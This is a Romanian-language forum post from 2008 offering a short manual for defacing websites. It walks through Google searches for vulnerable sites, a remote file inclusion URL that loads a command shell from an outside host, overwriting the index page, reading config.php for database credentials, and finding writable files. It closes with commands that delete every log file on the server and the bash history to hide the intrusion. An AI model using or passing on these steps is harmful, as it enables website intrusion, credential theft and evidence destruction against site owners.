Mini manualt pt a sarge web-s

    Share

    diana
    Moderator
    Moderator

    Female
    Number of posts : 118
    Age : 28
    Location : Romania
    Warnings: :
    0 / 1000 / 100

    Points : 46
    Registration date : 2008-01-01

    Mini manualt pt a sarge web-s

    Post by diana on Fri Mar 21, 2008 10:00 pm

    mini manualt pt a sarge web-s

    Noi numim deface atunci cand hackuim un web site.Asta in unele tari este ilegal si iti dau ani buni in inchisuare.Aceste deface se realizeaza prin erori numte BUGS

    #Cum se face un deface:
    •Cautand vulnerabilitati in google:
    Daca Bug-ul se gaseste intro carpeta poti scrie asta in google si o sa iti apara duar acea carpeta in diverse web.
    EXEMPLU

    Code:
     google:

        allinurl:/carpeta/bug


    Daca cea ce vrei sa spargi se diferenteaza pt ca zice "powered by... " poti folosi urmatorul lucru:

    Code:
    google:

        "powered by..."


    Code:
    google:
        allintxt: powered by.
    .


    •Cand il gasim:
    Daca gasesti BUG-ul tau,depinde de ce metoda de deface esti daca este RFI (REMOTE FILE INCLUSION), RRE (REMOTE ROOT EXPLOIT) ,SQL inject,etc... trebuie sa ai un bun shell: si sa stii niste comenzi de baza de LINUX o WINDOWS momentan vom vb doar de comenzi linux (shell:unelta facuta in diverse limbaje eu gandesc ca este un executor de comenzi) functioneaza asa:

    Code:
     shell:
        http://victima.com/path/bug.php?tipdeincludere=http://shell:.com/shell:.txt?&cmd=comanda linux pt folosire


    Pentru a putea sparge un site din index trebuie sa ai permisii de scriere daca iti apare asta in shell numai facand echo hacked by nick-u tau>index.php lai putea hackui.
    shell:

    Code:
    Permissão de Escrita: SIM


    Si daca nu avem permisie de scriere cautam arhiva numita config.php acolo se pastreaza users & pass ei datele adminuui te loghezi sau prin FTP

    Code:
     shell:
        cat config.php


    si o sati iasa toata configuratia WEB-ului pana si pass & user de su B.D absolut tot, sau daca vrei poti folosi comanda pentru a cauta arhive cu permisi de scriiere:

    Code:
     shell:
        cd /usr/www/htdocs/ondetuestesehhh/;find -perm 777



    si bingo iti apar toate arhivele cu drepturi de scriiere, DEJA ESTI UN DEFACER mint asta este duar inceputul .Razz

    Cred ca ai inteles.Acuma urmeaza comenzile Linux,sunt foarte simple in aceste tipuri de hack,deface aici lasa o lista basica de comenzi Linux si Windows ca sa stii cum sa navighezi cu shell-ul tau

    Comenzi

    Linux Windows Explicatie
    cat type Te uiti la continutul unei arhive
    cd, chdir cd, chdir Schimba directorul in curs.
    chmod attrib schimba modul unui fisier
    ls dir Te uiti la continutul directorului
    mkdir md, mkdir Creaza director
    mv move Muti o arhiva sau director
    rmdir rd, rmdir Elimini subdirector
    rm -r deltree Elimini subdirector si tot continutul sau
    echo echo Arata mesaje

    • La sfarsit:
    Sper ca ai inteles,totdeauna la terminarea unui DEFACE trebuie sa stergi logs, cel mai bine e sa stii u cei aia t ca eu un am timp sa va explic, sunt mai multe metode de a sterge acele logs dar cum esti un n00b ca sa un zic lammer o sa o facem de mod superficial:
    Mai intai gasim posibilele arhive logs si dupa aia le stergem

    Code:
      shell:
        find / -name "*.log" -exec rm -rf {} \;


    dupa aceia stergem arhivele .bash_history si .bash_logout am inteles de la cineva ca acolo este salvat totul ce se executa pe server
    shell: cd /;rm .bash_logout
    cd /;rm .bash_history

    Daca un gasiti aceste arhive rugativa la Dumnezeu sa un va gaseasca. Smile

      Current date/time is Tue Dec 06, 2016 4:54 am